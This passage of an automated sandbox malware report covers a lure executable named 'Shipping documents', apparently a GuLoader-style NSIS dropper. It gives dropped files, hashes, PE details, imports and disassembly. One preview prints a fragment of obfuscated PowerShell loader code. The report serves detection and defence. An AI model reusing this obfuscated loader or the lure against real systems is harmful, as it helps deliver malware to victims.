                  C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dllZe1Ueabtx5.imgGet hashmaliciousAgentTesla, GuLoaderBrowse
                    Documenti di spedizione 0009333000459595995.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                      4hIPvzV6a2.exeGet hashmaliciousUnknownBrowse
                        SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exeGet hashmaliciousUnknownBrowse
                          SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exeGet hashmaliciousUnknownBrowse
                            3Dut8dFCwD.exeGet hashmaliciousUnknownBrowse
                              Ms63nDrOBa.exeGet hashmaliciousUnknownBrowse
                                SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exeGet hashmaliciousUnknownBrowse
                                  SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exeGet hashmaliciousUnknownBrowse
                                    rSCAN31804.exeGet hashmaliciousGuLoader, RemcosBrowse

                                      Created / dropped Files

                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:modified
                                      Size (bytes):8003
                                      Entropy (8bit):4.840877972214509
                                      Encrypted:false
                                      SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                      MD5:106D01F562D751E62B702803895E93E0
                                      SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                      SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                      SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                      Malicious:false
                                      Reputation:moderate, very likely benign file
                                      Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b3z0ymdb.4qg.ps1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e3lkhfpk.zu3.psm1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll

                                      Download File
                                      Process:C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):7168
                                      Entropy (8bit):5.2959870663251625
                                      Encrypted:false
                                      SSDEEP:96:JwzdzBzMDhOZZDbXf5GsWvSv1ckne94SDbYkvML1HT1fUNQaSGYuH0DQ:JTQHDb2vSuOc41ZfUNQZGdHM
                                      MD5:B4579BC396ACE8CAFD9E825FF63FE244
                                      SHA1:32A87ED28A510E3B3C06A451D1F3D0BA9FAF8D9C
                                      SHA-256:01E72332362345C415A7EDCB366D6A1B52BE9AC6E946FB9DA49785C140BA1A4B
                                      SHA-512:3A76E0E259A0CA12275FED922CE6E01BDFD9E33BA85973E80101B8025EF9243F5E32461A113BBCC6AA75E40894BB5D3A42D6B21045517B6B3CF12D76B4CFA36A
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Joe Sandbox View:
                                      • Filename: Ze1Ueabtx5.img, Detection: malicious, Browse
                                      • Filename: Documenti di spedizione 0009333000459595995.exe, Detection: malicious, Browse
                                      • Filename: 4hIPvzV6a2.exe, Detection: malicious, Browse
                                      • Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exe, Detection: malicious, Browse
                                      • Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exe, Detection: malicious, Browse
                                      • Filename: 3Dut8dFCwD.exe, Detection: malicious, Browse
                                      • Filename: Ms63nDrOBa.exe, Detection: malicious, Browse
                                      • Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exe, Detection: malicious, Browse
                                      • Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exe, Detection: malicious, Browse
                                      • Filename: rSCAN31804.exe, Detection: malicious, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........................PE..L...Q.d...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Local\acneform\Baroco\Andenhaandsvidens.Typ

                                      Download File
                                      Process:C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):309691
                                      Entropy (8bit):7.744710277817117
                                      Encrypted:false
                                      SSDEEP:6144:cRFGTUnT0cBFL2/DPFEqINjmfKsC1pzEsvRpbqIYuWCB:cjGwT0kkLFEqqYnC1DvRpqJCB
                                      MD5:B563202661CAE7352789D2700253D473
                                      SHA1:1474AC798166DF321C9F518F27BA4937B7B49F9A
                                      SHA-256:803FF2DA19A7E7AD2182E0CBE2E3B3FD79BB998259B8DD5EBCA7E305677D90FD
                                      SHA-512:F27E1403772AEA0069B50631FE3DA1C64966D8F18BDC54278C55D80212CFEB66AFEA659FD28C97334406935454201C25C01C93364EA0D2F742F53402ADF8AB38
                                      Malicious:false
                                      Preview:.............bb............K.....D...:..............'................G.......????......W...................==....oo...................o..---.......9.......W.```.qqq.s.t.....................]]]]]............V...........nnnnn.........wwwww..G.........................................&....$...a..................................!.(.G......m.....S.i.&..E....;..............\............II........ ................................]]].........................W....................................................... .....@@..................M.\................SSS.......................1...................k.................................w..5..oo._____...iiii.....................#..........XXX......---............KKKKK.......TT.....((((.......z......`..........................).ooo...::...bbbbb...AAAA............*.................bb................R...............;;....................ss...HHHHHHH..................11..*.....f........jj.]............................''..........X..........{.z.&...

                                      C:\Users\user\AppData\Local\acneform\Baroco\Shipping documents 000022999878999800009999.exe

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                      Category:dropped
                                      Size (bytes):729960
                                      Entropy (8bit):7.605589195941063
                                      Encrypted:false
                                      SSDEEP:12288:ffLdembnSidCbvZROJ9cDGUugE6X12xKSl1a3qmFLgoXFDsiJjWlWVB0mPH4V:ffLNnSs8r4yDGOE6X12De6mF3XF4i7X2
                                      MD5:4ECAFA8F623606CAF0A925F5C6B2EB10
                                      SHA1:59CB79183B9547B3915C8AA09ED904F84BCAB22C
                                      SHA-256:3FE8F843E696C1DACBDCABED38D7132776915D89B60AC10C68FDA048CBFE044F
                                      SHA-512:D1DC9A1AF2FDF373893A99F16A6CBE7CF0F5C9C3B77936C8535AD0BBA226542C132F562B30551D9C10EE2EF249160E8AF85867ED3B2601198709D0E977A26323
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 26%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN.s~..PN..VH..PN.Rich.PN.........................PE..L...l.d.................j..........25............@.......................................@..........................................P...d..............X............................................................................................text....h.......j.................. ..`.rdata..d............n..............@..@.data...............................@....ndata.......P...........................rsrc....d...P...f..................@..@................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Local\acneform\Baroco\Shipping documents 000022999878999800009999.exe:Zone.Identifier

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):26
                                      Entropy (8bit):3.95006375643621
                                      Encrypted:false
                                      SSDEEP:3:ggPYV:rPYV
                                      MD5:187F488E27DB4AF347237FE461A079AD
                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                      Malicious:true
                                      Preview:[ZoneTransfer]....ZoneId=0

                                      C:\Users\user\AppData\Local\acneform\Baroco\Tarsometatarsal.Pla

                                      Download File
                                      Process:C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe
                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                      Category:dropped
                                      Size (bytes):72234
                                      Entropy (8bit):5.198340110893828
                                      Encrypted:false
                                      SSDEEP:1536:0dZHAPk4sNvIJYQwAnGjpWRBonT87MOgNW3W:0dZHAPkT4YOGqoTQoYG
                                      MD5:D44AF3867FA92AC621815B9DEB75C8DF
                                      SHA1:71DA815C2858476EECE49E9F2ADC54F8C6B69383
                                      SHA-256:887A1A4BF80BA10088A729662E66F7322B08E7A119F50A805AF6ACF110827375
                                      SHA-512:19E56B70F0A3663570007F4532960E43982176658932A97A7A1CD85D063ED47675CA0D41901994A0E9CF50C3A709D4CE038F006A1E82F3058533D2013C67E5BE
                                      Malicious:false
                                      Preview:$Patentets=$Pitmark5;<#Hematinuria Misassayed Powerdown Castro #><#Perikonens Stalakitterne Betatesternes Apaesthetic #><#Agnatical Spytningens Gorgonize Betagelser #><#Abdikationerne Editioner Kodeskrifternes Bandolerernes #><#Vaabenmrker Astrophotometrical Afskedigelsessituationerne Plexiglassene Assistants Lochs Bindegal #><#Forblffede Galvanotropic Nonimperialistically Strmpefod Listesituationerne Lifefully forenight #>$Paatraengende = "Conflat;Spe mat`$LaanekagLsni gsrHom genuBitonalnskibsdrdM,nosigmStyringo He.otrdNoninsie Rep bllLacta i= I,cita`$AmalgamS Fore.apkrambo l Hubrise Su depnEucaryooAs ortepsig orsa D,snskrReform eAst tetcTotterrt K ubseaAmfibiemMagteslaOutargu;TriaminfDemocrauUninjurn KoderecOksehaltagendeniundfango SuperpnHumaned Chili dMKluppeniSpaadomsmangania UdrejsuLater,ttUdt renhtullesoo Me,rolrInternaiJakobinzParlameeBatussisHyperth Thre od( Sprout`$KmpemyrPH.taerisPa.ochieHarroweu LegropdTerningoskuren,jSimaroue Hal,iorMa nifiv MyrnasiDurkdrenCertaine dilant,

                                      C:\Users\user\AppData\Local\acneform\Baroco\afplingen.che

                                      Download File
                                      Process:C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):245776
                                      Entropy (8bit):1.2423947315855175
                                      Encrypted:false
                                      SSDEEP:768:7x19EzEPqdI04IDk5wH/o606sFjlhpHi98oiQErpn6jGW3LSSW1Vn+7xd4R89Z9u:13ujvdGpic/cN2q8+js/5/H
                                      MD5:9F9EC5CB34B99692A4EAC963634A7D82
                                      SHA1:5C1C97F3B00365F6CDB43112D31D7DD3AA050870
                                      SHA-256:7579E3606C789ED66E555D541F14BDA6ECAEA4B2EB7B7BC3A25E7C804B3AB48F
                                      SHA-512:A574404306396B333F64FC16256C093CA1F2B6CF87E5675ED678F00DE3B899FFE4A95CBA4D1113B9C86B8C46549D06D7AB97930955F921CD73AE37D4067B1EB0
                                      Malicious:false
                                      Preview:......................................................{............J...............l....................w...........N....................................................................\.........................................|.........................{..............i.................................k...............!......&..............................................................................................................."...........................t.:...s............................................................A...................................................................d.........................2.......|................................................Y............&...............................5.......(................................`..............................*............i..........................................>........................................~.....................................................................................................I

                                      C:\Users\user\AppData\Local\acneform\Baroco\forlggere.bov

                                      Download File
                                      Process:C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):452228
                                      Entropy (8bit):1.250842541049128
                                      Encrypted:false
                                      SSDEEP:768:qlmssNPVJP2ri6hEVTp7WLL1GEOCTOemgej7kcwntQz2Y1drtNhgCV+AhB/7/dR+:5tvPloD3bnq3TzwesbDEfLeaz6oSzjU8
                                      MD5:30C2C02FB78EFAA65C6A38457A7DC4F6
                                      SHA1:40AEF6B9982695F88F0515104BFEEACFAF22FEDA
                                      SHA-256:CE57C2DEDAA3A0FD5F5C267F3336F5ACB6109D00D31A98D4638D26A77939CEFC
                                      SHA-512:8AC0B2E7831C801D7C4043195BEFC309F2C79BE719FF0171D0A4E580671EBADD2F737C307A4AAE2E548705CD11B24FE64F07C6E842D7DD5D3CCD88EA677BC7FA
                                      Malicious:false
                                      Preview:...........................................t..................................................................................................a..............d...........................o.........................=..#..............0.........<.........0.......................>..........`..........................................................................................:.........u.............................................0.................................C..~.............................................X......................................................"............................f........................................w.................................{............................"..................e........................................f...........l...............................................I............................ Z...........................;.............;.................................u.................................................................%....

                                      C:\Users\user\AppData\Local\acneform\Baroco\rettersted.bef

                                      Download File
                                      Process:C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):328009
                                      Entropy (8bit):1.2551228776153396
                                      Encrypted:false
                                      SSDEEP:1536:AfCPIKQLWsgBwj5eZNb+h+QkSGkJPsGyksKU:ATKZNbTQkSGky0sKU
                                      MD5:78C7002A6C29415CEA767894F99BDF01
                                      SHA1:37B39AF4E61D2A97D1B1AEA54D1C3C3D8C3AD6D8
                                      SHA-256:414BB9BB930F1269088CF9BF027667E6B9A4130E6E719E7C178406A8C8C3183E
                                      SHA-512:A39B5656AF287783AB4C5E211C148D2D233AB635E8D8C4870693D31267904E9C94A3BCC07B20F92C55F68BC7E6E2B5F1D22C6ED3F9B3A729CABD14B2E7B58D58
                                      Malicious:false
                                      Preview:..............................................A............................................]..............2.................................N.................................................................................................................................i.......................................................................................X............h...................j...........,............)...w....................................R.................................V...............................................................R.../.........................................)...................................................].............................,...v............................................./.......................................`........)........#..........x............H.....................................v..........K..........................................................................................................*............................

                                      C:\Users\user\AppData\Local\acneform\Baroco\xenosaurid.txt

                                      Download File
                                      Process:C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):453
                                      Entropy (8bit):4.241518252490206
                                      Encrypted:false
                                      SSDEEP:6:mTXCFWRbo5FpTNrQNFqqhq48RZ8av8Atp3d6G4bg3pCp+oWKHYAtpcRvFVTZqIMC:0X4OA7aY48MNAtDMeExYAYdfqI1f1o2
                                      MD5:261F38F05E7DE27DA302C07B62E1F94D
                                      SHA1:8D495D43FC7A2B40C52B8D31678F24B519257610
                                      SHA-256:50D950EE2F6CD5D31AAA35B913DC46C8EEE3120B7444EF5EBB302B88851F3328
                                      SHA-512:62106A1D3608A63C12D6E9A7A00FD775ECD38193B779D4C13E18850230F1C7A1F0BD5DF0602AF5553F24BB0BAD6703BB9DC00C09C14E91DD098CE4EC95050E47
                                      Malicious:false
                                      Preview:stulls sprttede trlkvinder materialerne,disciplinerendes antirailwayist topchefs dhyana behovsanalyserne,vager cimnel bonderve debitable karyotin sadelmagervrkstederne samfundskonomien plakatopstning horologe vaner taleruafhaengigt..flimmer carryout arbejdsdisketterne breakaxe vidtaabne elastose.attestationerne mennonist rubicon barogrammerne respectively reddet overretention,brdknivenes yndlingsbog ministate paleogeographically repenalize henriett.

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                      Entropy (8bit):7.605589195941063
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:Shipping documents 000022999878999800009999.exe
                                      File size:729'960 bytes
                                      MD5:4ecafa8f623606caf0a925f5c6b2eb10
                                      SHA1:59cb79183b9547b3915c8aa09ed904f84bcab22c
                                      SHA256:3fe8f843e696c1dacbdcabed38d7132776915d89b60ac10c68fda048cbfe044f
                                      SHA512:d1dc9a1af2fdf373893a99f16a6cbe7cf0f5c9c3b77936c8535ad0bba226542c132f562b30551d9c10ee2ef249160e8af85867ed3b2601198709d0e977a26323
                                      SSDEEP:12288:ffLdembnSidCbvZROJ9cDGUugE6X12xKSl1a3qmFLgoXFDsiJjWlWVB0mPH4V:ffLNnSs8r4yDGOE6X12De6mF3XF4i7X2
                                      TLSH:4CF412047FBCD2E3C0D42A7E59B6834B2BF0A25751090F17B214AF5EAC5D2D6950AFE8
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L...l..d.................j.........

                                      File Icon

                                      Icon Hash:2b25372d4e5ad12f

                                      Static PE Info

                                      General

                                      Entrypoint:0x403532
                                      Entrypoint Section:.text
                                      Digitally signed:true
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x64A0DC6C [Sun Jul 2 02:09:48 2023 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:f4639a0b3116c2cfc71144b88a929cfd

                                      Authenticode Signature

                                      Signature Valid:false
                                      Signature Issuer:CN="Ophugningen Maeonides ", O=Raatret, L=Flagstaff, S=Arizona, C=US
                                      Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                      Error Number:-2146762487
                                      Not Before, Not After
                                      • 24/12/2023 12:28:21 23/12/2026 12:28:21
                                      Subject Chain
                                      • CN="Ophugningen Maeonides ", O=Raatret, L=Flagstaff, S=Arizona, C=US
                                      Version:3
                                      Thumbprint MD5:B7FC25FDC76F19849826C649699B6B9B
                                      Thumbprint SHA-1:3B09DDF7435AE977C88A85277838BE6C095F73D5
                                      Thumbprint SHA-256:290642CA085C9EE9159E8262A26D3C642EFA1B94CCA16BC01E460C6D1529CC3A
                                      Serial:197015574DF969D30A05FE16D98927E74E8458B0

                                      Entrypoint Preview

                                      Instruction
                                      sub esp, 000003F8h
                                      push ebp
                                      push esi
                                      push edi
                                      push 00000020h
                                      pop edi
                                      xor ebp, ebp
                                      push 00008001h
                                      mov dword ptr [esp+20h], ebp
                                      mov dword ptr [esp+18h], 0040A2D8h
                                      mov dword ptr [esp+14h], ebp
                                      call dword ptr [004080A4h]
                                      mov esi, dword ptr [004080A8h]
                                      lea eax, dword ptr [esp+34h]
                                      push eax
                                      mov dword ptr [esp+4Ch], ebp
                                      mov dword ptr [esp+0000014Ch], ebp
                                      mov dword ptr [esp+00000150h], ebp
                                      mov dword ptr [esp+38h], 0000011Ch
                                      call esi
                                      test eax, eax
                                      jne 00007F31FCEC334Ah
                                      lea eax, dword ptr [esp+34h]
                                      mov dword ptr [esp+34h], 00000114h
                                      push eax
                                      call esi
                                      mov ax, word ptr [esp+48h]
                                      mov ecx, dword ptr [esp+62h]
                                      sub ax, 00000053h
                                      add ecx, FFFFFFD0h
                                      neg ax
                                      sbb eax, eax
                                      mov byte ptr [esp+0000014Eh], 00000004h
                                      not eax
                                      and eax, ecx
                                      mov word ptr [esp+00000148h], ax
                                      cmp dword ptr [esp+38h], 0Ah
                                      jnc 00007F31FCEC3318h
                                      and word ptr [esp+42h], 0000h
                                      mov eax, dword ptr [esp+40h]
                                      movzx ecx, byte ptr [esp+3Ch]
                                      mov dword ptr [004347B8h], eax
                                      xor eax, eax
                                      mov ah, byte ptr [esp+38h]
                                      movzx eax, ax
                                      or eax, ecx
                                      xor ecx, ecx
                                      mov ch, byte ptr [esp+00000148h]
                                      movzx ecx, cx
                                      shl eax, 10h
                                      or eax, ecx
                                      movzx ecx, byte ptr [esp+0000004Eh]

                                      Rich Headers

                                      Programming Language:
                                      • [EXP] VC++ 6.0 SP5 build 8804

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x86080xa0.rdata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x650000x264e8.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0xb1a100x958
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x80000x2a8.rdata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x10000x68d80x6a00742185983fa6320c910f81782213e56fFalse0.6695165094339622data6.478461709868021IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rdata0x80000x14640x1600a995b118b38426885fc6ccaa984c8b7aFalse0.4314630681818182data4.969091535632612IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .data0xa0000x2a8180x6009a9bf385a30f1656fc362172b16d9268False0.5247395833333334data4.172601271908501IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .ndata0x350000x300000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rsrc0x650000x264e80x266008c15b9178dda9297a3b68e6314e77cb0False0.48827488802931596data5.053989943267582IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                      Resources

                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      RT_ICON0x652c80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536EnglishUnited States0.4677629244055365
                                      RT_ICON0x75af00x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 36864EnglishUnited States0.5025751524069791
                                      RT_ICON0x7ef980x5488Device independent bitmap graphic, 72 x 144 x 32, image size 20736EnglishUnited States0.5306377079482439
                                      RT_ICON0x844200x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384EnglishUnited States0.5394426074633916
                                      RT_ICON0x886480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216EnglishUnited States0.5737551867219917
                                      RT_DIALOG0x8abf00x100dataEnglishUnited States0.5234375
                                      RT_DIALOG0x8acf00x11cdataEnglishUnited States0.6056338028169014
                                      RT_DIALOG0x8ae100xc4dataEnglishUnited States0.5918367346938775
                                      RT_DIALOG0x8aed80x60dataEnglishUnited States0.7291666666666666
                                      RT_GROUP_ICON0x8af380x4cdataEnglishUnited States0.8157894736842105
                                      RT_VERSION0x8af880x21cdataEnglishUnited States0.5388888888888889
                                      RT_MANIFEST0x8b1a80x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795

                                      Imports

                                      DLLImport
                                      ADVAPI32.dllRegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
                                      SHELL32.dllSHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
                                      ole32.dllCoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
                                      COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
                                      USER32.dllMessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
                                      GDI32.dllGetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
                                      KERNEL32.dlllstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW

                                      Possible Origin

                                      Language of compilation systemCountry where language is spokenMap
                                      EnglishUnited States

                                      Network Behavior

                                      Suricata IDS Alerts

                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
